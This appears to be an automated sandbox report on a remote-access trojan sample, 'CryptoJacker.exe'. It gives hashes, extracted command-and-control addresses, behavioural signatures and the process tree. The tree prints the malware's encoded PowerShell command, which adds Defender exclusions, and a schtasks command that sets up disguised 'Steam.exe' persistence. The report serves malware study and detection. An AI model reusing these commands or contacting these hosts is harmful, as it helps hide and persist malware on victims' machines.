Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
01-07-2024 13:07
Static task
static1
Behavioral task
behavioral1
Sample
CryptoJacker.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
CryptoJacker.exe
Resource
win10v2004-20240508-en
General
-
Target
CryptoJacker.exe
-
Size
10.6MB
-
MD5
d8a30735aa4702e200ed432d223c3ad8
-
SHA1
fa144148c226a9d08e1d1179cfa60597d4f08cac
-
SHA256
24aeb855ead570407cef3835b4e5ac516e9ec8dd1d0105662727e4f12082b3d2
-
SHA512
cbc030dd159172c2448554393caeb8b0c910d302dec1edc3a719c47be01bb90a4c243d1d15f0cbfebaf0e016cebec7e5c173c4d5cdd27ffdb557716f2071014a
-
SSDEEP
196608:g0Kn9PL3A8tKCn4bwcfAjSNgeQ4ZhseG0j73cQIqW3yiFoNWpPm4Q:/KnZQ4n4Z5Ve0PJIf3rFXdm4Q
Malware Config
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
10.0.2.15:9090
10.0.2.15:52033
147.185.221.19:9090
147.185.221.19:52033
yigdzohbebyxyvvzbc
-
delay
1
-
install
true
-
install_file
Steam.exe
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Main.exe family_asyncrat -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
CryptoJacker.exeMain.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation CryptoJacker.exe Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation Main.exe -
Executes dropped EXE 4 IoCs
Processes:
crypto_jacker.exeMain.execrypto_jacker.exeSteam.exepid process 4976 crypto_jacker.exe 912 Main.exe 2204 crypto_jacker.exe 5060 Steam.exe -
Loads dropped DLL 17 IoCs
Processes:
crypto_jacker.exepid process 2204 crypto_jacker.exe 2204 crypto_jacker.exe 2204 crypto_jacker.exe 2204 crypto_jacker.exe 2204 crypto_jacker.exe 2204 crypto_jacker.exe 2204 crypto_jacker.exe 2204 crypto_jacker.exe 2204 crypto_jacker.exe 2204 crypto_jacker.exe 2204 crypto_jacker.exe 2204 crypto_jacker.exe 2204 crypto_jacker.exe 2204 crypto_jacker.exe 2204 crypto_jacker.exe 2204 crypto_jacker.exe 2204 crypto_jacker.exe -
Detects Pyinstaller 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\crypto_jacker.exe pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 4676 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeMain.exeSteam.exepid process 1976 powershell.exe 1976 powershell.exe 912 Main.exe 912 Main.exe 912 Main.exe 912 Main.exe 912 Main.exe 912 Main.exe 912 Main.exe 912 Main.exe 912 Main.exe 912 Main.exe 912 Main.exe 912 Main.exe 912 Main.exe 912 Main.exe 912 Main.exe 912 Main.exe 912 Main.exe 912 Main.exe 912 Main.exe 912 Main.exe 912 Main.exe 912 Main.exe 912 Main.exe 912 Main.exe 912 Main.exe 912 Main.exe 912 Main.exe 5060 Steam.exe 5060 Steam.exe 5060 Steam.exe 5060 Steam.exe 5060 Steam.exe 5060 Steam.exe 5060 Steam.exe 5060 Steam.exe 5060 Steam.exe 5060 Steam.exe 5060 Steam.exe 5060 Steam.exe 5060 Steam.exe 5060 Steam.exe 5060 Steam.exe 5060 Steam.exe 5060 Steam.exe 5060 Steam.exe 5060 Steam.exe 5060 Steam.exe 5060 Steam.exe 5060 Steam.exe 5060 Steam.exe 5060 Steam.exe 5060 Steam.exe 5060 Steam.exe 5060 Steam.exe 5060 Steam.exe 5060 Steam.exe 5060 Steam.exe 5060 Steam.exe 5060 Steam.exe 5060 Steam.exe 5060 Steam.exe 5060 Steam.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
Main.exepowershell.exeSteam.exedescription pid process Token: SeDebugPrivilege 912 Main.exe Token: SeDebugPrivilege 1976 powershell.exe Token: SeDebugPrivilege 5060 Steam.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Steam.exepid process 5060 Steam.exe -
Suspicious use of WriteProcessMemory 19 IoCs
Processes:
CryptoJacker.execrypto_jacker.exeMain.execmd.execmd.exedescription pid process target process PID 3128 wrote to memory of 1976 3128 CryptoJacker.exe powershell.exe PID 3128 wrote to memory of 1976 3128 CryptoJacker.exe powershell.exe PID 3128 wrote to memory of 1976 3128 CryptoJacker.exe powershell.exe PID 3128 wrote to memory of 4976 3128 CryptoJacker.exe crypto_jacker.exe PID 3128 wrote to memory of 4976 3128 CryptoJacker.exe crypto_jacker.exe PID 3128 wrote to memory of 912 3128 CryptoJacker.exe Main.exe PID 3128 wrote to memory of 912 3128 CryptoJacker.exe Main.exe PID 4976 wrote to memory of 2204 4976 crypto_jacker.exe crypto_jacker.exe PID 4976 wrote to memory of 2204 4976 crypto_jacker.exe crypto_jacker.exe PID 912 wrote to memory of 2284 912 Main.exe cmd.exe PID 912 wrote to memory of 2284 912 Main.exe cmd.exe PID 912 wrote to memory of 3368 912 Main.exe cmd.exe PID 912 wrote to memory of 3368 912 Main.exe cmd.exe PID 3368 wrote to memory of 4676 3368 cmd.exe timeout.exe PID 3368 wrote to memory of 4676 3368 cmd.exe timeout.exe PID 2284 wrote to memory of 2140 2284 cmd.exe schtasks.exe PID 2284 wrote to memory of 2140 2284 cmd.exe schtasks.exe PID 3368 wrote to memory of 5060 3368 cmd.exe Steam.exe PID 3368 wrote to memory of 5060 3368 cmd.exe Steam.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\CryptoJacker.exe"C:\Users\Admin\AppData\Local\Temp\CryptoJacker.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAcABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGkAcgB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAbQB6ACMAPgA="2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\crypto_jacker.exe"C:\Users\Admin\AppData\Local\Temp\crypto_jacker.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\crypto_jacker.exe"C:\Users\Admin\AppData\Local\Temp\crypto_jacker.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\Main.exe"C:\Users\Admin\AppData\Local\Temp\Main.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"'4⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp52A4.tmp.bat""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Roaming\Steam.exe"C:\Users\Admin\AppData\Roaming\Steam.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Main.exeFilesize
74KB
MD5b8ccfc163e2d56a73b6fd7387a45e6eb
SHA1f81a368c275574fa808a92d29c5e0b37e01162ce
SHA2568386fa61b6c5f873c692fbd3b394851ec714e5c852898ef6f622035e4d3d5e84
SHA5128ea7d2ee4fa1f737e7c77dda98963a1c9d3a3276ab0d0d327b5df41682da91996e2e17cbfdb99ddf9399a819c6ec9cdde18b6a8fe6cf221960103b34acb21faf
-
C:\Users\Admin\AppData\Local\Temp\_MEI49762\VCRUNTIME140.dllFilesize
106KB
MD54585a96cc4eef6aafd5e27ea09147dc6
SHA1489cfff1b19abbec98fda26ac8958005e88dd0cb
SHA256a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736
SHA512d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286
-
C:\Users\Admin\AppData\Local\Temp\_MEI49762\_bz2.pydFilesize
82KB
MD5a62207fc33140de460444e191ae19b74
SHA19327d3d4f9d56f1846781bcb0a05719dea462d74
SHA256ebcac51449f323ae3ae961a33843029c34b6a82138ccd9214cf99f98dd2148c2
SHA51290f9db9ee225958cb3e872b79f2c70cb1fd2248ebaa8f3282afff9250285852156bf668f5cfec49a4591b416ce7ebaaac62d2d887152f5356512f2347e3762b7
-
C:\Users\Admin\AppData\Local\Temp\_MEI49762\_cffi_backend.cp311-win_amd64.pydFilesize
177KB
MD5210def84bb2c35115a2b2ac25e3ffd8f
SHA10376b275c81c25d4df2be4789c875b31f106bd09
SHA25659767b0918859beddf28a7d66a50431411ffd940c32b3e8347e6d938b60facdf
SHA512cd5551eb7afd4645860c7edd7b0abd375ee6e1da934be21a6099879c8ee3812d57f2398cad28fbb6f75bba77471d9b32c96c7c1e9d3b4d26c7fc838745746c7f
-
C:\Users\Admin\AppData\Local\Temp\_MEI49762\_ctypes.pydFilesize
120KB
MD59b344f8d7ce5b57e397a475847cc5f66
SHA1aff1ccc2608da022ecc8d0aba65d304fe74cdf71
SHA256b1214d7b7efd9d4b0f465ec3463512a1cbc5f59686267030f072e6ce4b2a95cf
SHA5122b0d9e1b550bf108fa842324ab26555f2a224aefff517fdb16df85693e05adaf0d77ebe49382848f1ec68dc9b5ae75027a62c33721e42a1566274d1a2b1baa41
-
C:\Users\Admin\AppData\Local\Temp\_MEI49762\_decimal.pydFilesize
247KB
MD5692c751a1782cc4b54c203546f238b73
SHA1a103017afb7badaece8fee2721c9a9c924afd989
SHA256c70f05f6bc564fe400527b30c29461e9642fb973f66eec719d282d3d0b402f93
SHA5121b1ad0ca648bd50ce6e6af4be78ad818487aa336318b272417a2e955ead546c9e0864b515150cd48751a03ca8c62f9ec91306cda41baea52452e3fcc24d57d39
-
C:\Users\Admin\AppData\Local\Temp\_MEI49762\_hashlib.pydFilesize
63KB
MD5787b82d4466f393366657b8f1bc5f1a9
SHA1658639cddda55ac3bfc452db4ec9cf88851e606b
SHA256241322647ba9f94bdc3ae387413ffb57ae14c8cf88bd564a31fe193c6ca43e37
SHA512afcf66962958f38eec8b591aa30d380eb0e1b41028836058ff91b4d1472658de9fba3262f5c27ba688bd73da018e938f398e45911cd37584f623073067f575b6
-
C:\Users\Admin\AppData\Local\Temp\_MEI49762\_lzma.pydFilesize
155KB
MD50c7ea68ca88c07ae6b0a725497067891
SHA1c2b61a3e230b30416bc283d1f3ea25678670eb74
SHA256f74aaf0aa08cf90eb1eb23a474ccb7cb706b1ede7f911daf7ae68480765bdf11
SHA512fd52f20496a12e6b20279646663d880b1354cffea10793506fe4560ed7da53e4efba900ae65c9996fbb3179c83844a9674051385e6e3c26fb2622917351846b9
-
C:\Users\Admin\AppData\Local\Temp\_MEI49762\_queue.pydFilesize
31KB
MD506248702a6cd9d2dd20c0b1c6b02174d
SHA13f14d8af944fe0d35d17701033ff1501049e856f
SHA256ac177cd84c12e03e3a68bca30290bc0b8f173eee518ef1fa6a9dce3a3e755a93
SHA5125b22bbff56a8b48655332ebd77387d307f5c0a526626f3654267a34bc4863d8afaf08ff3946606f3cf00b660530389c37bdfac91843808dbebc7373040fec4c1
-
C:\Users\Admin\AppData\Local\Temp\_MEI49762\_socket.pydFilesize
77KB
MD526dd19a1f5285712068b9e41808e8fa0
SHA190c9a112dd34d45256b4f2ed38c1cbbc9f24dba5
SHA256eaabf6b78840daeaf96b5bdbf06adf0e4e2994dfeee5c5e27fefd824dbda5220
SHA512173e1eda05d297d7da2193e8566201f05428437adcac80aecefe80f82d46295b15ce10990b5c080325dc59a432a587eef84a15ec688a62b82493ad501a1e4520
-
C:\Users\Admin\AppData\Local\Temp\_MEI49762\_ssl.pydFilesize
157KB
MD5ab0e4fbffb6977d0196c7d50bc76cf2d
SHA1680e581c27d67cd1545c810dbb175c2a2a4ef714
SHA256680ad2de8a6cff927822c1d7dd22112a3e8a824e82a7958ee409a7b9ce45ec70
SHA5122bff84a8ec7a26dde8d1bb09792ead8636009c8ef3fa68300a75420197cd7b6c8eaaf8db6a5f97442723e5228afa62961f002948e0eeee8c957c6517547dffba
-
C:\Users\Admin\AppData\Local\Temp\_MEI49762\base_library.zipFilesize
1.4MB
MD58364dba9ceeb85f3626507e423f68636
SHA111459bfa8551a196b611a59581e7a577a7f687d1
SHA256515cb3b5f5e4d8d342ee14182856fea014b61caa67623bb16e44388811ed2030
SHA5125f5f957db58d635b14b10abd4d167bc6b5c6ac4bea4c3fe5d7b82fdae4ccfdacf38607cfeadd33d703247c32cbbf70e91a8f2eecc138fa169b70f052a0a1b18a
-
C:\Users\Admin\AppData\Local\Temp\_MEI49762\libcrypto-1_1.dllFilesize
3.3MB
MD59d7a0c99256c50afd5b0560ba2548930
SHA176bd9f13597a46f5283aa35c30b53c21976d0824
SHA2569b7b4a0ad212095a8c2e35c71694d8a1764cd72a829e8e17c8afe3a55f147939
SHA512cb39aa99b9d98c735fdacf1c5ed68a4d09d11f30262b91f6aa48c3f8520eff95e499400d0ce7e280ca7a90ff6d7141d2d893ef0b33a8803a1cadb28ba9a9e3e2
-
C:\Users\Admin\AppData\Local\Temp\_MEI49762\libffi-8.dllFilesize
38KB
MD50f8e4992ca92baaf54cc0b43aaccce21
SHA1c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA5126e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978
-
C:\Users\Admin\AppData\Local\Temp\_MEI49762\libssl-1_1.dllFilesize
688KB
MD5bec0f86f9da765e2a02c9237259a7898
SHA13caa604c3fff88e71f489977e4293a488fb5671c
SHA256d74ce01319ae6f54483a19375524aa39d9f5fd91f06cf7df238ca25e043130fd
SHA512ffbc4e5ffdb49704e7aa6d74533e5af76bbe5db297713d8e59bd296143fe5f145fbb616b343eed3c48eceaccccc2431630470d8975a4a17c37eafcc12edd19f4
-
C:\Users\Admin\AppData\Local\Temp\_MEI49762\python3.DLLFilesize
65KB
MD57442c154565f1956d409092ede9cc310
SHA1c72f9c99ea56c8fb269b4d6b3507b67e80269c2d
SHA25695086ac060ffe6933ac04a6aa289b1c7d321f14380315e24ba0d6c4adfa0842b
SHA5122bf96828534bcdf71e48d1948b989011d8e3ba757c38cc17905a13d3021ea5deb57e2c68d79507a6acbb62be009cfc85b24d14543958dba1d3bc3e4ca7d4f844
-
C:\Users\Admin\AppData\Local\Temp\_MEI49762\python311.dllFilesize
5.5MB
MD5e2bd5ae53427f193b42d64b8e9bf1943
SHA17c317aad8e2b24c08d3b8b3fba16dd537411727f
SHA256c4844b05e3a936b130adedb854d3c04d49ee54edb43e9d36f8c4ae94ccb78400
SHA512ae23a6707e539c619fd5c5b4fc6e4734edc91f89ebe024d25ff2a70168da6105ac0bd47cf6bf3715af6411963caf0acbb4632464e1619ca6361abf53adfe7036
-
C:\Users\Admin\AppData\Local\Temp\_MEI49762\select.pydFilesize
29KB
MD5756c95d4d9b7820b00a3099faf3f4f51
SHA1893954a45c75fb45fe8048a804990ca33f7c072d
SHA25613e4d9a734a453a3613e11b6a518430099ad7e3d874ea407d1f9625b7f60268a
SHA5120f54f0262cf8d71f00bf5666eb15541c6ecc5246cd298efd3b7dd39cdd29553a8242d204c42cfb28c537c3d61580153200373c34a94769f102b3baa288f6c398
-
C:\Users\Admin\AppData\Local\Temp\_MEI49762\unicodedata.pydFilesize
1.1MB
MD558f7988b50cba7b793884f580c7083e1
SHA1d52c06b19861f074e41d8b521938dee8b56c1f2e
SHA256e36d14cf49ca2af44fae8f278e883341167bc380099dac803276a11e57c9cfa1
SHA512397fa46b90582f8a8cd7df23b722204c38544717bf546837c45e138b39112f33a1850be790e248fca5b5ecd9ed7c91cd1af1864f72717d9805c486db0505fb9c
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ejhphxlk.z43.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\crypto_jacker.exeFilesize
10.5MB
MD5ccb8c058314c049211a16c6291182261
SHA1f47c9a4cb2b48e5ede2d4a4bd934c2cd98cd9b90
SHA25630da0a0cf38714ea7b3c3f1b6c30f810912e7cae78a053511ba1b3e03c9b6499
SHA512c878cf36309e91450791a6e4e0c3163b1226bbfcb6fdcdb3d421f228ed5c65771d3982f7f6ca24d5946f41aed5447de446f80fd92abeee6231d79f4860c76c71
-
C:\Users\Admin\AppData\Local\Temp\tmp52A4.tmp.batFilesize
149B
MD5c15ee9a257c5e727c1468c9bcedee5e6
SHA1aa714e11c93d62f6aa7f1cb022bacf7fdc234d74
SHA256bffc06483844a448bb4f70648af75843b54389073a33c5013a7bd016528f9039
SHA5125c6619a41234d15a1faf7e7ff2ddf32e4b3abb9ce81160bd6adb2a87e82f10b33cb49e6c73a8fb7f1ce8193b3cebda2d8e3a55d57e1edd7d0b777df045a0ede3
-
C:\Users\Admin\AppData\Roaming\MyData\DataLogs.confFilesize
8B
MD5cf759e4c5f14fe3eec41b87ed756cea8
SHA1c27c796bb3c2fac929359563676f4ba1ffada1f5
SHA256c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
SHA512c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b
-
memory/912-26-0x000000001B0E0000-0x000000001B0F0000-memory.dmpFilesize
64KB
-
memory/912-20-0x00000000003D0000-0x00000000003E8000-memory.dmpFilesize
96KB
-
memory/912-19-0x00007FFC9B8F3000-0x00007FFC9B8F5000-memory.dmpFilesize
8KB
-
memory/1976-58-0x00000000055F0000-0x0000000005656000-memory.dmpFilesize
408KB
-
memory/1976-95-0x0000000005C80000-0x0000000005CCC000-memory.dmpFilesize
304KB
-
memory/1976-94-0x0000000005C40000-0x0000000005C5E000-memory.dmpFilesize
120KB
-
memory/1976-70-0x0000000005760000-0x0000000005AB4000-memory.dmpFilesize
3.3MB
-
memory/1976-56-0x0000000005580000-0x00000000055E6000-memory.dmpFilesize
408KB
-
memory/1976-49-0x0000000004E90000-0x0000000004EB2000-memory.dmpFilesize
136KB
-
memory/1976-24-0x0000000004F50000-0x0000000005578000-memory.dmpFilesize
6.2MB
-
memory/1976-25-0x0000000004910000-0x0000000004920000-memory.dmpFilesize
64KB
-
memory/1976-22-0x0000000004910000-0x0000000004920000-memory.dmpFilesize
64KB
-
memory/1976-21-0x0000000002660000-0x0000000002696000-memory.dmpFilesize
216KB
-
memory/1976-113-0x0000000074D70000-0x0000000074DBC000-memory.dmpFilesize
304KB
-
memory/1976-123-0x0000000006E10000-0x0000000006E2E000-memory.dmpFilesize
120KB
-
memory/1976-124-0x0000000006E30000-0x0000000006ED3000-memory.dmpFilesize
652KB
-
memory/1976-112-0x0000000006210000-0x0000000006242000-memory.dmpFilesize
200KB
-
memory/1976-125-0x00000000075B0000-0x0000000007C2A000-memory.dmpFilesize
6.5MB
-
memory/1976-126-0x0000000006F70000-0x0000000006F8A000-memory.dmpFilesize
104KB
-
memory/1976-127-0x0000000006FF0000-0x0000000006FFA000-memory.dmpFilesize
40KB
-
memory/1976-128-0x00000000071F0000-0x0000000007286000-memory.dmpFilesize
600KB
-
memory/1976-129-0x0000000007170000-0x0000000007181000-memory.dmpFilesize
68KB
-
memory/1976-130-0x00000000071B0000-0x00000000071BE000-memory.dmpFilesize
56KB
-
memory/1976-131-0x00000000071C0000-0x00000000071D4000-memory.dmpFilesize
80KB
-
memory/1976-132-0x00000000072B0000-0x00000000072CA000-memory.dmpFilesize
104KB
-
memory/1976-133-0x0000000007290000-0x0000000007298000-memory.dmpFilesize
32KB
-
memory/1976-5-0x000000007378E000-0x000000007378F000-memory.dmpFilesize
4KB